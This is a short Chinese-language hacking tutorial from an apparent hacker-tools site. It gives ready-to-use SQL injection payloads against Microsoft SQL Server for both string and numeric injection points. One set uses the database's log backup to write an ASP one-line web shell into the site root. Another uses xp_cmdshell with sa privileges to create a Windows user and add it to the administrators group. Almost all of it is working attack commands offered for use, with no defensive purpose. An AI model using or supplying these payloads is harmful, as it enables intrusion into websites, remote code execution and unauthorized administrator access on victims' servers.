手工实现差异备份步骤 - 打造国内专业网络安全动画技术交流站点---黑客动画$黑客教程$安全培训$黑软下载$黑客动画教程$黑客软件$黑客工具$菜鸟入门

字符型

1.恢复当前库
;alter database 当前库 set RECOVERY FULL--

2.创建表cmd
;create table cmd (a image)--

3.备份当前库到D:\cmd1
;backup log 当前库 to disk = 'D:\cmd1' with init--

4.插入一句话代码到创建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--

5.备份一句话代码到站点根目录
;backup log 当前库 to disk = 'D:\www_web\oct.asp'--

6.完成
';drop table 创建的表--

----------------------------------

数字型

1.恢复当前库
';alter database 当前库 set RECOVERY FULL--

2.创建表cmd
';create table cmd (a image)--

3.备份当前库到D:\cmd1
';backup log 当前库 to disk = 'D:\cmd1' with init--

4.插入一句话代码到创建的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--

5.备份一句话代码到站点根目录
';backup log 当前库 to disk = 'D:\www_web\oct.asp'--

6.完成
';drop table 创建的表--

--------------------------------

sa权限创建管理员用户

1.判断是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判断当前系统的连接用户是不是sa

2.添加系统的管理员
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--